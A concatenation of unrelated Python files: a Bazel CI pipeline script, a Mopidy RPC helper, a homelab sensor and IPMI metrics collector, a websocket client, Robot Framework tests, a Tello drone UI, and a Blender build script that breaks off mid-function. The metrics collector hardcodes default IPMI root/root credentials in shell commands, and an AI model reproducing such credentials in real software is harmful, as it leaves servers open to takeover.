project_pipeline.add_argument("--http_config", type=str)
project_pipeline.add_argument("--git_repository", type=str)
project_pipeline.add_argument("--monitor_flaky_tests", type=bool, nargs="?", const=True)
project_pipeline.add_argument("--use_but", type=bool, nargs="?", const=True)
project_pipeline.add_argument("--incompatible_flag", type=str, action="append")
project_pipeline.add_argument("--notify", type=bool, nargs="?", const=True)
runner = subparsers.add_parser("runner")
runner.add_argument("--task", action="store", type=str, default="")
runner.add_argument("--file_config", type=str)
runner.add_argument("--http_config", type=str)
runner.add_argument("--git_repository", type=str)
runner.add_argument(
"--git_commit", type=str, help="Reset the git repository to this commit after cloning it"
)
runner.add_argument(
"--repo_location",
type=str,
help="Use an existing repository instead of cloning from github",
)
runner.add_argument(
"--use_bazel_at_commit", type=str, help="Use Bazel binary built at a specific commit"
)
runner.add_argument("--use_but", type=bool, nargs="?", const=True)
runner.add_argument("--save_but", type=bool, nargs="?", const=True)
runner.add_argument("--needs_clean", type=bool, nargs="?", const=True)
runner.add_argument("--build_only", type=bool, nargs="?", const=True)
runner.add_argument("--test_only", type=bool, nargs="?", const=True)
runner.add_argument("--monitor_flaky_tests", type=bool, nargs="?", const=True)
runner.add_argument("--incompatible_flag", type=str, action="append")
subparsers.add_parser("publish_binaries")
subparsers.add_parser("try_update_last_green_commit")
subparsers.add_parser("try_update_last_green_downstream_commit")
args = parser.parse_args(argv)
if args.script:
global SCRIPT_URL
SCRIPT_URL = args.script
try:
if args.subparsers_name == "bazel_publish_binaries_pipeline":
configs = fetch_configs(args.http_config, args.file_config)
print_bazel_publish_binaries_pipeline(
task_configs=configs.get("tasks", None),
http_config=args.http_config,
file_config=args.file_config,
)
elif args.subparsers_name == "bazel_downstream_pipeline":
configs = fetch_configs(args.http_config, args.file_config)
print_bazel_downstream_pipeline(
task_configs=configs.get("tasks", None),
http_config=args.http_config,
file_config=args.file_config,
test_incompatible_flags=args.test_incompatible_flags,
test_disabled_projects=args.test_disabled_projects,
notify=args.notify,
)
elif args.subparsers_name == "project_pipeline":
configs = fetch_configs(args.http_config, args.file_config)
print_project_pipeline(
configs=configs,
project_name=args.project_name,
http_config=args.http_config,
file_config=args.file_config,
git_repository=args.git_repository,
monitor_flaky_tests=args.monitor_flaky_tests,
use_but=args.use_but,
incompatible_flags=args.incompatible_flag,
notify=args.notify,
)
elif args.subparsers_name == "runner":
configs = fetch_configs(args.http_config, args.file_config)
tasks = configs.get("tasks", {})
task_config = tasks.get(args.task)
if not task_config:
raise BuildkiteException(
"No such task '{}' in configuration. Available: {}".format(
args.task, ", ".join(tasks)
)
)
platform = get_platform_for_task(args.task, task_config)
# The value of `BUILDKITE_MESSAGE` defaults to the commit message, which can be too large
# on Windows, therefore we truncate the value to 1000 characters.
# See https://github.com/bazelbuild/continuous-integration/issues/1218
if "BUILDKITE_MESSAGE" in os.environ:
os.environ["BUILDKITE_MESSAGE"] = os.environ["BUILDKITE_MESSAGE"][:1000]
execute_commands(
task_config=task_config,
platform=platform,
git_repository=args.git_repository,
git_commit=args.git_commit,
repo_location=args.repo_location,
use_bazel_at_commit=args.use_bazel_at_commit,
use_but=args.use_but,
save_but=args.save_but,
needs_clean=args.needs_clean,
build_only=args.build_only,
test_only=args.test_only,
monitor_flaky_tests=args.monitor_flaky_tests,
incompatible_flags=args.incompatible_flag,
bazel_version=task_config.get("bazel") or configs.get("bazel"),
)
elif args.subparsers_name == "publish_binaries":
publish_binaries()
elif args.subparsers_name == "try_update_last_green_commit":
# Update the last green commit of a project pipeline
try_update_last_green_commit()
elif args.subparsers_name == "try_update_last_green_downstream_commit":
# Update the last green commit of the downstream pipeline
try_update_last_green_downstream_commit()
else:
parser.print_help()
return 2
except BuildkiteException as e:
eprint(str(e))
return 1
return 0
if __name__ == "__main__":
sys.exit(main())
|
utils.py
|
import json
import requests
def run_async(func):
"""Function decorator intended to make "func" run in a separate thread
(asynchronously).
:param func: the function to run asynchronously
:return: the created Thread object that the function is running in.
"""
from threading import Thread
from functools import wraps
@wraps(func)
def async_func(*args, **kwargs):
"""Run a function asynchronously
:param args: all arguments will be passed to the target function
:param kwargs: pass a Queue.Queue() object with the optional 'queue'
keyword if you would like to retrieve the results after the thread
has run. All other keyword arguments will be passed to the target
function.
:return: the created Thread object that the function is running in.
"""
t = Thread(target=func, args=args, kwargs=kwargs)
queue = kwargs.get("queue", None)
if queue is not None:
t.result_queue = queue
t.start()
return t
return async_func
def format_proxy(proxy_config):
if not proxy_config.get("hostname"):
return None
port = proxy_config.get("port")
if not port or port < 0:
port = 80
template = "{hostname}:{port}"
return template.format(hostname=proxy_config["hostname"], port=port)
class RPCClient:
hostname = "127.0.0.1"
port = "6680"
url = "http://" + str(hostname) + ":" + str(port) + "/mopidy/rpc"
id = 0
@classmethod
def configure(cls, hostname, port):
cls.hostname = hostname
cls.port = port
@classmethod
@run_async
def _do_rpc(cls, method, params=None, queue=None):
"""Makes an asynchronously remote procedure call to the Mopidy server.
:param method: the name of the Mopidy remote procedure to be called
(typically from the 'core' module.
:param params: a dictionary of argument:value pairs to be passed
directly to the remote procedure.
:param queue: a Queue.Queue() object that the results of the thread
should be stored in.
"""
cls.id += 1
data = {"method": method, "jsonrpc": "2.0", "id": cls.id}
if params is not None:
data["params"] = params
json_data = json.loads(
requests.request(
"POST",
cls.url,
data=json.dumps(data),
headers={"Content-Type": "application/json"},
).text
)
if queue is not None:
queue.put(json_data["result"])
|
humidity.py
|
#! /usr/bin/python3
import logging
import multiprocessing
from concurrent.futures.thread import ThreadPoolExecutor
from multiprocessing import Process
import statsd
import Adafruit_DHT
import time
import boto3
import sys
import subprocess
import os
from timeit import default_timer as timer
from threading import Thread
from threading import Lock
from queue import Queue
from dotenv import load_dotenv
load_dotenv()
DHT_PIN = 4
STATSD_ENDPOINT = os.environ['statsd_url']
statsd = statsd.StatsClient(STATSD_ENDPOINT, 8125, prefix='totomz.homelab')
skip_ipmi = dict()
q = Queue()
HOSTS = {
'zione': {'ipmi': False},
'ziobob': {'ipmi': '192.168.10.30', 'lock': Lock()},
'ziocharlie': {'ipmi': '192.168.10.31', 'lock': Lock()},
}
vgpulock = Lock()
sensorlock = Lock()
def str2float(string, default=0.0):
res = default
try:
res = float(string)
except Exception:
res = default
return res
def collect_sensor():
log = multiprocessing.get_logger()
log.info(" --> Collecting temperature and humidity")
global q
lock = sensorlock.acquire(blocking=False)
if lock is False:
log.info(f" --> Collecting sensors :: still being queried....skipping")
return
try:
humidity, temperature = Adafruit_DHT.read_retry(Adafruit_DHT.DHT22, DHT_PIN)
# humidity, temperature = 0, 1
finally:
sensorlock.release()
results = dict()
results['rack.humidity'] = humidity
results['rack.temperature'] = temperature
log.info(f" --> Temperature: {temperature} Humidity: {humidity}")
if len(results) > 0:
q.put(results)
def collect_ipmi():
log = multiprocessing.get_logger()
global q
results = dict()
log.info(" --> Collecting ipmi")
def ipmi_poll(hostname):
if skip_ipmi.get(hostname, 0) > 0:
print(f"Host {hostname} is in the skipped list")
skip_ipmi[hostname] = skip_ipmi.get(hostname, 0) - 1
return results
lock = HOSTS[hostname]['lock'].acquire(blocking=False)
if lock is False:
log.info(f" --> Collecting ipmi :: {hostname} still being queried....skipping")
return
try:
log.info(f" --> Collecting ipmi :: {hostname} querying")
out = subprocess.check_output("ipmitool -P root -U root -H {ip} sensor".format(ip=HOSTS[hostname]['ipmi']),
stderr=subprocess.STDOUT,
shell=True)
stdout = str(out.decode('utf-8'))
log.info(f" --> Collecting ipmi :: {hostname} got readings")
metrics = stdout.split("\n")
for line in metrics:
metric_line = line.lower()
if "temp" not in metric_line:
continue
p = metric_line.split("|")
metric_name = f"host.{hostname}.{str.lower(str.strip(str.strip(p[0]))).replace(' ', '_')}"
metric_value = str2float(str.strip(p[1]), 0)
results[metric_name] = metric_value
except Exception as e:
step = 5
print(f"Error processing IPMI for {hostname} - slpeeping for {step} steps")
skip_ipmi[hostname] = step
finally:
HOSTS[hostname]['lock'].release()
with ThreadPoolExecutor(max_workers=2) as pool:
pool.map(ipmi_poll, ['ziobob', 'ziocharlie'])
log.info(" --> Collecting ipmi done")
if len(results) > 0:
q.put(results)
def collect_vgpu():
log = multiprocessing.get_logger()
global q
global vgpulock
hostname = "zione"
log.info(" --> Collecting vGPU")
results = dict()
lock = vgpulock.acquire(blocking=False)
if lock is False:
log.info(f" --> Collecting vGPU :: still being queried....skipping")
return
try:
out = subprocess.check_output(f"ssh root@{hostname} \"nvidia-smi -q\"",
stderr=subprocess.STDOUT,
shell=True)
stdout = str(out.decode('utf-8'))
except Exception as e:
log.error(f"Error vGPU", e)
finally:
vgpulock.release()
lines = stdout.split("\n")
current_gpu = None
def pop_metric(name_prefix):
m = lines.pop(0).lower().split(":")
metric_name = f"{name_prefix}.{m[0].strip().replace(' ', '_')}"
metric_value = m[1].split()[0].strip()
results[f"host.zione.gpu.{metric_name}"] = str2float(metric_value)
while len(lines):
line = lines.pop(0)
if line.startswith('GPU 0000:'):
current_gpu = line.split('GPU ')[1].split(':')[1]
if current_gpu is None:
continue
if line.startswith(" FB Memory Usage"):
pop_metric(f"{current_gpu}.memory.framebuffer") # total
pop_metric(f"{current_gpu}.memory.framebuffer") # used
pop_metric(f"{current_gpu}.memory.framebuffer") # free
if line.startswith(" BAR1 Memory Usage"):
pop_metric(f"{current_gpu}.memory.bar") # total
pop_metric(f"{current_gpu}.memory.bar") # used
pop_metric(f"{current_gpu}.memory.bar") # free
line = lines.pop(0)
if line.startswith(" Utilization"):
pop_metric(f"{current_gpu}.utilization") # gpu
pop_metric(f"{current_gpu}.utilization") # memory
pop_metric(f"{current_gpu}.utilization") # encoder
pop_metric(f"{current_gpu}.utilization") # decoder
line = lines.pop(0)
if line.startswith(" Temperature"):
pop_metric(f"{current_gpu}.temp") # gpu
if line.startswith(" Power Readings"):
lines.pop(0) # Skip Power Management
pop_metric(f"{current_gpu}.power") # Draw
if line == " Clocks":
pop_metric(f"{current_gpu}.power") # Graphics
pop_metric(f"{current_gpu}.power") # SM
pop_metric(f"{current_gpu}.power") # Memory
pop_metric(f"{current_gpu}.power") # Video
log.info(f" --> Collecting vGPU :: {len(results)}")
if len(results) > 0:
q.put(results)
def statsd_writer():
log = multiprocessing.get_logger()
global q
while True:
log.info("Waiting for metrics")
metrics = q.get(block=True)
for k in metrics:
log.info(f":statsd {k} ==> {metrics[k]}")
statsd.gauge(k, metrics[k])
log.info(f"--> Bobmaaaa {len(metrics)}")
print("Starting temperature and humidity monitoring service....")
sys.stdout.flush()
if __name__ == '__main__':
log = multiprocessing.get_logger()
log.setLevel(logging.INFO)
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(logging.Formatter(' --> [%(asctime)s] - %(processName)s - %(message)s'))
log.addHandler(handler)
log.info("# Starting statsd writer")
worker = Thread(target=statsd_writer)
worker.daemon = True # Die with your parent
worker.start()
while True:
log.info("# waking up workers")
for func in [
collect_vgpu,
collect_ipmi,
collect_sensor
]:
worker = Thread(target=func)
worker.daemon = True # Die with your parent
worker.start()
time.sleep(5)
|
non_block_client.py
|
import websocket
import threading
from time import sleep
def on_message(ws, message):
print(message)
def on_close(ws):
print("closed")
if __name__ == "__main__":
websocket.enableTrace(True)
ws = websocket.WebSocketApp("ws://localhost:9001", on_message = on_message, on_close = on_close)
wst = threading.Thread(target=ws.run_forever)
wst.daemon = True
wst.start()
conn_timeout = 5
while not ws.sock.connected and conn_timeout:
sleep(1)
conn_timeout -= 1
msg_counter = 0
while ws.sock.connected:
#ws.send('Hello world %d'%msg_counter)
sleep(1)
msg_counter += 1
|
test_run_and_rebot.py
|
import unittest
import time
import glob
import sys
import threading
import tempfile
import signal
import logging
from os.path import abspath, dirname, join, exists, curdir
from os import chdir
from robot import run, rebot
from robot.model import SuiteVisitor
from robot.running import namespace
from robot.utils import StringIO
from robot.utils.asserts import assert_equal, assert_true
from resources.runningtestcase import RunningTestCase
from resources.Listener import Listener
ROOT = dirname(dirname(dirname(abspath(__file__))))
TEMP = tempfile.gettempdir()
OUTPUT_PATH = join(TEMP, 'output.xml')
REPORT_PATH = join(TEMP, 'report.html')
LOG_PATH = join(TEMP, 'log.html')
LOG = 'Log: %s' % LOG_PATH
def run_without_outputs(*args, **kwargs):
kwargs.update(output='NONE', log='NoNe', report=None)
return run(*args, **kwargs)
class StreamWithOnlyWriteAndFlush(object):
def __init__(self):
self._buffer = []
def write(self, msg):
self._buffer.append(msg)
def flush(self):
pass
def getvalue(self):
return ''.join(self._buffer)
class TestRun(RunningTestCase):
data = join(ROOT, 'atest', 'testdata', 'misc', 'pass_and_fail.robot')
warn = join(ROOT, 'atest', 'testdata', 'misc', 'warnings_and_errors.robot')
nonex = join(TEMP, 'non-existing-file-this-is.robot')
remove_files = [LOG_PATH, REPORT_PATH, OUTPUT_PATH]
def test_run_once(self):
assert_equal(run(self.data, outputdir=TEMP, report='none'), 1)
self._assert_outputs([('Pass And Fail', 2), (LOG, 1), ('Report:', 0)])
assert exists(LOG_PATH)
def test_run_multiple_times(self):
assert_equal(run_without_outputs(self.data, critical='nomatch'), 0)
assert_equal(run_without_outputs(self.data, name='New Name'), 1)
self._assert_outputs([('Pass And Fail', 2), ('New Name', 2), (LOG, 0)])
def test_run_fail(self):
assert_equal(run(self.data, outputdir=TEMP), 1)
self._assert_outputs(stdout=[('Pass And Fail', 2), (LOG, 1)])
def test_run_error(self):
assert_equal(run(self.nonex), 252)
self._assert_outputs(stderr=[('[ ERROR ]', 1), (self.nonex, 1),
('--help', 1)])
def test_custom_stdout(self):
stdout = StringIO()
assert_equal(run_without_outputs(self.data, stdout=stdout), 1)
self._assert_output(stdout, [('Pass And Fail', 2), ('Output:', 1),
('Log:', 0), ('Report:', 0)])
self._assert_outputs()
def test_custom_stderr(self):
stderr = StringIO()
assert_equal(run_without_outputs(self.warn, stderr=stderr), 0)
self._assert_output(stderr, [('[ WARN ]', 4), ('[ ERROR ]', 2)])
self._assert_outputs([('Warnings And Errors', 2), ('Output:', 1),
('Log:', 0), ('Report:', 0)])
def test_custom_stdout_and_stderr_with_minimal_implementation(self):
output = StreamWithOnlyWriteAndFlush()
assert_equal(run_without_outputs(self.warn, stdout=output, stderr=output), 0)
self._assert_output(output, [('[ WARN ]', 4), ('[ ERROR ]', 2),
('Warnings And Errors', 3), ('Output:', 1),
('Log:', 0), ('Report:', 0)])
self._assert_outputs()
def test_multi_options_as_single_string(self):
assert_equal(run_without_outputs(self.data, exclude='fail'), 0)
self._assert_outputs([('FAIL', 0)])
def test_listener_gets_notification_about_log_report_and_output(self):
listener = join(ROOT, 'utest', 'resources', 'Listener.py')
assert_equal(run(self.data, output=OUTPUT_PATH, report=REPORT_PATH,
log=LOG_PATH, listener=listener), 1)
self._assert_outputs(stdout=[('[output {0}]'.format(OUTPUT_PATH), 1),
('[report {0}]'.format(REPORT_PATH), 1),
('[log {0}]'.format(LOG_PATH), 1),
('[listener close]', 1)])
def test_pass_listener_as_instance(self):
assert_equal(run_without_outputs(self.data, listener=Listener(1)), 1)
self._assert_outputs([("[from listener 1]", 1)])
def test_pass_listener_as_string(self):
module_file = join(ROOT, 'utest', 'resources', 'Listener.py')
assert_equal(run_without_outputs(self.data, listener=module_file+":1"), 1)
self._assert_outputs([("[from listener 1]", 1)])
def test_pass_listener_as_list(self):
module_file = join(ROOT, 'utest', 'resources', 'Listener.py')
assert_equal(run_without_outputs(self.data, listener=[module_file+":1", Listener(2)]), 1)
self._assert_outputs([("[from listener 1]", 1), ("[from listener 2]", 1)])
def test_pre_run_modifier_as_instance(self):
class Modifier(SuiteVisitor):
def start_suite(self, suite):
suite.tests = [t for t in suite.tests if t.tags.match('pass')]
assert_equal(run_without_outputs(self.data, prerunmodifier=Modifier()), 0)
self._assert_outputs([('Pass ', 1), ('Fail :: FAIL', 0)])
def test_pre_rebot_modifier_as_instance(self):
class Modifier(SuiteVisitor):
def __init__(self):
self.tests = []
def visit_test(self, test):
self.tests.append(test.name)
modifier = Modifier()
assert_equal(run(self.data, outputdir=TEMP, log=LOG_PATH, prerebotmodifier=modifier), 1)
assert_equal(modifier.tests, ['Pass', 'Fail'])
self._assert_outputs([('Pass ', 1), ('Fail :: FAIL', 1)])
def test_invalid_modifier(self):
assert_equal(run_without_outputs(self.data, prerunmodifier=42), 1)
self._assert_outputs([('Pass ', 1), ('Fail :: FAIL', 1)],
[("[ ERROR ] Executing model modifier 'integer' "
"failed: AttributeError: ", 1)])
class TestRebot(RunningTestCase):
data = join(ROOT, 'atest', 'testdata', 'rebot', 'created_normal.xml')
nonex = join(TEMP, 'non-existing-file-this-is.xml')
remove_files = [LOG_PATH, REPORT_PATH]
def test_run_once(self):
assert_equal(rebot(self.data, outputdir=TEMP, report='NONE'), 1)
self._assert_outputs([(LOG, 1), ('Report:', 0)])
assert exists(LOG_PATH)
def test_run_multiple_times(self):
assert_equal(rebot(self.data, outputdir=TEMP, critical='nomatch'), 0)
assert_equal(rebot(self.data, outputdir=TEMP, name='New Name'), 1)
self._assert_outputs([(LOG, 2)])
def test_run_fails(self):
assert_equal(rebot(self.nonex), 252)
assert_equal(rebot(self.data, outputdir=TEMP), 1)
self._assert_outputs(stdout=[(LOG, 1)],
stderr=[('[ ERROR ]', 1), (self.nonex, (1, 2)),
('--help', 1)])
def test_custom_stdout(self):
stdout = StringIO()
assert_equal(rebot(self.data, report='None', stdout=stdout,
outputdir=TEMP), 1)
self._assert_output(stdout, [('Log:', 1), ('Report:', 0)])
self._assert_outputs()
def test_custom_stdout_and_stderr_with_minimal_implementation(self):
output = StreamWithOnlyWriteAndFlush()
assert_equal(rebot(self.data, log='NONE', report='NONE', stdout=output,
stderr=output), 252)
assert_equal(rebot(self.data, report='NONE', stdout=output,
stderr=output, outputdir=TEMP), 1)
self._assert_output(output, [('[ ERROR ] No outputs created', 1),
('--help', 1), ('Log:', 1), ('Report:', 0)])
self._assert_outputs()
def test_pre_rebot_modifier_as_instance(self):
class Modifier(SuiteVisitor):
def __init__(self):
self.tests = []
def visit_test(self, test):
self.tests.append(test.name)
test.status = 'FAIL'
modifier = Modifier()
assert_equal(rebot(self.data, outputdir=TEMP,
prerebotmodifier=modifier), 3)
assert_equal(modifier.tests, ['Test 1.1', 'Test 1.2', 'Test 2.1'])
class TestStateBetweenTestRuns(RunningTestCase):
data = join(ROOT, 'atest', 'testdata', 'misc', 'normal.robot')
def test_importer_caches_are_cleared_between_runs(self):
self._run(self.data)
lib = self._import_library()
res = self._import_resource()
self._run(self.data)
assert_true(lib is not self._import_library())
assert_true(res is not self._import_resource())
def _run(self, data, **config):
return run_without_outputs(data, outputdir=TEMP, **config)
def _import_library(self):
return namespace.IMPORTER.import_library('BuiltIn', None, None, None)
def _import_resource(self):
resource = join(ROOT, 'atest', 'testdata', 'core', 'resources.robot')
return namespace.IMPORTER.import_resource(resource)
def test_clear_namespace_between_runs(self):
data = join(ROOT, 'atest', 'testdata', 'variables', 'commandline_variables.robot')
rc = self._run(data, test=['NormalText'], variable=['NormalText:Hello'])
assert_equal(rc, 0)
rc = self._run(data, test=['NormalText'])
assert_equal(rc, 1)
def test_reset_logging_conf(self):
assert_equal(logging.getLogger().handlers, [])
assert_equal(logging.raiseExceptions, 1)
self._run(join(ROOT, 'atest', 'testdata', 'misc', 'normal.robot'))
assert_equal(logging.getLogger().handlers, [])
assert_equal(logging.raiseExceptions, 1)
def test_listener_unregistration(self):
listener = join(ROOT, 'utest', 'resources', 'Listener.py')
assert_equal(run_without_outputs(self.data, listener=listener+':1'), 0)
self._assert_outputs([("[from listener 1]", 1), ("[listener close]", 1)])
self._clear_outputs()
assert_equal(run_without_outputs(self.data), 0)
self._assert_outputs([("[from listener 1]", 0), ("[listener close]", 0)])
class TestTimestampOutputs(RunningTestCase):
output = join(TEMP, 'output-ts-*.xml')
report = join(TEMP, 'report-ts-*.html')
log = join(TEMP, 'log-ts-*.html')
remove_files = [output, report, log]
def test_different_timestamps_when_run_multiple_times(self):
self.run_tests()
output1, = self.find_results(self.output, 1)
report1, = self.find_results(self.report, 1)
log1, = self.find_results(self.log, 1)
self.wait_until_next_second()
self.run_tests()
output21, output22 = self.find_results(self.output, 2)
report21, report22 = self.find_results(self.report, 2)
log21, log22 = self.find_results(self.log, 2)
assert_equal(output1, output21)
assert_equal(report1, report21)
assert_equal(log1, log21)
def run_tests(self):
data = join(ROOT, 'atest', 'testdata', 'misc', 'pass_and_fail.robot')
assert_equal(run(data, timestampoutputs=True, outputdir=TEMP,
output='output-ts.xml', report='report-ts.html',
log='log-ts'), 1)
def find_results(self, pattern, expected):
matches = glob.glob(pattern)
assert_equal(len(matches), expected)
return sorted(matches)
def wait_until_next_second(self):
start = time.localtime()[5]
while time.localtime()[5] == start:
time.sleep(0.01)
class TestSignalHandlers(unittest.TestCase):
data = join(ROOT, 'atest', 'testdata', 'misc', 'pass_and_fail.robot')
def test_original_signal_handlers_are_restored(self):
orig_sigint = signal.getsignal(signal.SIGINT)
orig_sigterm = signal.getsignal(signal.SIGTERM)
my_sigterm = lambda signum, frame: None
signal.signal(signal.SIGTERM, my_sigterm)
try:
run_without_outputs(self.data, stdout=StringIO())
assert_equal(signal.getsignal(signal.SIGINT), orig_sigint)
assert_equal(signal.getsignal(signal.SIGTERM), my_sigterm)
finally:
signal.signal(signal.SIGINT, orig_sigint)
signal.signal(signal.SIGTERM, orig_sigterm)
def test_dont_register_signal_handlers_then_run_on_thread(self):
stream = StringIO()
thread = threading.Thread(target=run_without_outputs, args=(self.data,),
kwargs=dict(stdout=stream, stderr=stream))
thread.start()
thread.join()
output = stream.getvalue()
assert_true('ERROR' not in output.upper(), 'Errors:\n%s' % output)
class TestRelativeImportsFromPythonpath(RunningTestCase):
data = join(abspath(dirname(__file__)), 'import_test.robot')
def setUp(self):
self._orig_path = abspath(curdir)
chdir(ROOT)
sys.path.append(join('atest', 'testresources'))
def tearDown(self):
chdir(self._orig_path)
sys.path.pop()
def test_importing_library_from_pythonpath(self):
errors = StringIO()
run(self.data, outputdir=TEMP, stdout=StringIO(), stderr=errors)
self._assert_output(errors, '')
if __name__ == '__main__':
unittest.main()
|
ui.py
|
import tkinter as tki
from tkinter import Toplevel, Scale
import threading
import datetime
import os
import time
import platform
class TelloUI(object):
"""
Wrapper class to enable the GUI.
"""
def __init__(self, tello):
"""
Initializes all the element of the GUI, supported by Tkinter
:param tello: class interacts with the Tello drone.
"""
self.tello = tello # videostream device
self.thread = None # thread of the Tkinter mainloop
self.stopEvent = None
# control variables
self.distance = 0.1 # default distance for 'move' cmd
self.degree = 30 # default degree for 'cw' or 'ccw' cmd
# if the flag is TRUE,the auto-takeoff thread will stop waiting
# for the response from tello
self.quit_waiting_flag = False
# initialize the root window and image panel
self.root = tki.Tk()
self.panel = None
# create buttons
self.btn_landing = tki.Button(
self.root, text='Open Command Panel', relief='raised', command=self.openCmdWindow)
self.btn_landing.pack(side='bottom', fill='both',
expand='yes', padx=10, pady=5)
# start a thread that constantly pools the video sensor for
# the most recently read frame
self.stopEvent = threading.Event()
# set a callback to handle when the window is closed
self.root.wm_title('TELLO Controller')
self.root.wm_protocol('WM_DELETE_WINDOW', self.on_close)
# the sending_command will send command to tello every 5 seconds
self.sending_command_thread = threading.Thread(target = self._sendingCommand)
def _sendingCommand(self):
"""
Starts a while loop that sends 'command' to tello every 5 second.
:return: None
"""
while True:
self.tello.send_command('command')
time.sleep(5)
def _setQuitWaitingFlag(self):
"""
Set the variable as TRUE; it will stop computer waiting for response from tello.
:return: None
"""
self.quit_waiting_flag = True
def openCmdWindow(self):
"""
Open the cmd window and initial all the button and text.
:return: None
"""
panel = Toplevel(self.root)
panel.wm_title('Command Panel')
# create text input entry
text0 = tki.Label(panel,
text='This Controller map keyboard inputs to Tello control commands\n'
'Adjust the trackbar to reset distance and degree parameter',
font='Helvetica 10 bold'
)
text0.pack(side='top')
text1 = tki.Label(panel, text=
'W - Move Tello Up\t\t\tArrow Up - Move Tello Forward\n'
'S - Move Tello Down\t\t\tArrow Down - Move Tello Backward\n'
'A - Rotate Tello Counter-Clockwise\tArrow Left - Move Tello Left\n'
'D - Rotate Tello Clockwise\t\tArrow Right - Move Tello Right',
justify='left')
text1.pack(side='top')
self.btn_landing = tki.Button(
panel, text='Land', relief='raised', command=self.telloLanding)
self.btn_landing.pack(side='bottom', fill='both',
expand='yes', padx=10, pady=5)
self.btn_takeoff = tki.Button(
panel, text='Takeoff', relief='raised', command=self.telloTakeOff)
self.btn_takeoff.pack(side='bottom', fill='both',
expand='yes', padx=10, pady=5)
# binding arrow keys to drone control
self.tmp_f = tki.Frame(panel, width=100, height=2)
self.tmp_f.bind('<KeyPress-w>', self.on_keypress_w)
self.tmp_f.bind('<KeyPress-s>', self.on_keypress_s)
self.tmp_f.bind('<KeyPress-a>', self.on_keypress_a)
self.tmp_f.bind('<KeyPress-d>', self.on_keypress_d)
self.tmp_f.bind('<KeyPress-Up>', self.on_keypress_up)
self.tmp_f.bind('<KeyPress-Down>', self.on_keypress_down)
self.tmp_f.bind('<KeyPress-Left>', self.on_keypress_left)
self.tmp_f.bind('<KeyPress-Right>', self.on_keypress_right)
self.tmp_f.pack(side='bottom')
self.tmp_f.focus_set()
self.btn_landing = tki.Button(
panel, text='Flip', relief='raised', command=self.openFlipWindow)
self.btn_landing.pack(side='bottom', fill='both',
expand='yes', padx=10, pady=5)
self.distance_bar = Scale(panel, from_=0.02, to=5, tickinterval=0.01,
digits=3, label='Distance(m)',
resolution=0.01)
self.distance_bar.set(0.2)
self.distance_bar.pack(side='left')
self.btn_distance = tki.Button(panel, text='Reset Distance', relief='raised',
command=self.updateDistancebar,
)
self.btn_distance.pack(side='left', fill='both',
expand='yes', padx=10, pady=5)
self.degree_bar = Scale(panel, from_=1, to=360, tickinterval=10, label='Degree')
self.degree_bar.set(30)
self.degree_bar.pack(side='right')
self.btn_distance = tki.Button(panel, text='Reset Degree', relief='raised',
command=self.updateDegreebar)
self.btn_distance.pack(side='right', fill='both',
expand='yes', padx=10, pady=5)
def openFlipWindow(self):
"""
Open the flip window and initial all the button and text.
:return: None
"""
panel = Toplevel(self.root)
panel.wm_title('Gesture Recognition')
self.btn_flipl = tki.Button(
panel, text='Flip Left', relief='raised', command=self.telloFlip_l)
self.btn_flipl.pack(side='bottom', fill='both',
expand='yes', padx=10, pady=5)
self.btn_flipr = tki.Button(
panel, text='Flip Right', relief='raised', command=self.telloFlip_r)
self.btn_flipr.pack(side='bottom', fill='both',
expand='yes', padx=10, pady=5)
self.btn_flipf = tki.Button(
panel, text='Flip Forward', relief='raised', command=self.telloFlip_f)
self.btn_flipf.pack(side='bottom', fill='both',
expand='yes', padx=10, pady=5)
self.btn_flipb = tki.Button(
panel, text='Flip Backward', relief='raised', command=self.telloFlip_b)
self.btn_flipb.pack(side='bottom', fill='both',
expand='yes', padx=10, pady=5)
def telloTakeOff(self):
return self.tello.takeoff()
def telloLanding(self):
return self.tello.land()
def telloFlip_l(self):
return self.tello.flip('l')
def telloFlip_r(self):
return self.tello.flip('r')
def telloFlip_f(self):
return self.tello.flip('f')
def telloFlip_b(self):
return self.tello.flip('b')
def telloCW(self, degree):
return self.tello.rotate_cw(degree)
def telloCCW(self, degree):
return self.tello.rotate_ccw(degree)
def telloMoveForward(self, distance):
return self.tello.move_forward(distance)
def telloMoveBackward(self, distance):
return self.tello.move_backward(distance)
def telloMoveLeft(self, distance):
return self.tello.move_left(distance)
def telloMoveRight(self, distance):
return self.tello.move_right(distance)
def telloUp(self, dist):
return self.tello.move_up(dist)
def telloDown(self, dist):
return self.tello.move_down(dist)
def updateDistancebar(self):
self.distance = self.distance_bar.get()
print(f'reset distance to {self.distance:.1f}')
def updateDegreebar(self):
self.degree = self.degree_bar.get()
print(f'reset distance to {self.degree}')
def on_keypress_w(self, event):
print(f'up {self.distance} m')
self.telloUp(self.distance)
def on_keypress_s(self, event):
print(f'down {self.distance} m')
self.telloDown(self.distance)
def on_keypress_a(self, event):
print(f'ccw {self.degree} degree')
self.tello.rotate_ccw(self.degree)
def on_keypress_d(self, event):
print(f'cw {self.degree} m')
self.tello.rotate_cw(self.degree)
def on_keypress_up(self, event):
print(f'forward {self.distance} m')
self.telloMoveForward(self.distance)
def on_keypress_down(self, event):
print(f'backward {self.distance} m')
self.telloMoveBackward(self.distance)
def on_keypress_left(self, event):
print(f'left {self.distance} m')
self.telloMoveLeft(self.distance)
def on_keypress_right(self, event):
print(f'right {self.distance} m')
self.telloMoveRight(self.distance)
def on_close(self):
"""
Sets the stop event, cleanup the camera, and allow the rest of
the quit process to continue.
:return: None
"""
print('[INFO] closing...')
self.stopEvent.set()
del self.tello
self.root.quit()
|
make.py
|
import os
import glob
import time
import shutil
import bpy
import json
import stat
from bpy.props import *
import subprocess
import threading
import webbrowser
import arm.utils
import arm.write_data as write_data
import arm.make_logic as make_logic
import arm.make_renderpath as make_renderpath
import arm.make_world as make_world
import arm.make_state as state
import arm.assets as assets
import arm.log as log
import arm.lib.make_datas
import arm.lib.server
from arm.exporter import ArmoryExporter
exporter = ArmoryExporter()
scripts_mtime = 0 # Monitor source changes
profile_time = 0
def run_proc(cmd, done):
def fn(p, done):
p.wait()
if done != None:
done()
p = subprocess.Popen(cmd)
threading.Thread(target=fn, args=(p, done)).start()
return p
def compile_shader_pass(res, raw_shaders_path, shader_name, defs):
os.chdir(raw_shaders_path + '/' + shader_name)
# Open json file
json_name = shader_name + '.json'
with open(json_name) as f:
json_file = f.read()
json_data = json.loads(json_file)
fp = arm.utils.get_fp_build()
arm.lib.make_datas.make(res, shader_name, json_data, fp, defs)
path = fp + '/compiled/Shaders'
c = json_data['contexts'][0]
for s in ['vertex_shader', 'fragment_shader', 'geometry_shader', 'tesscontrol_shader', 'tesseval_shader']:
if s in c:
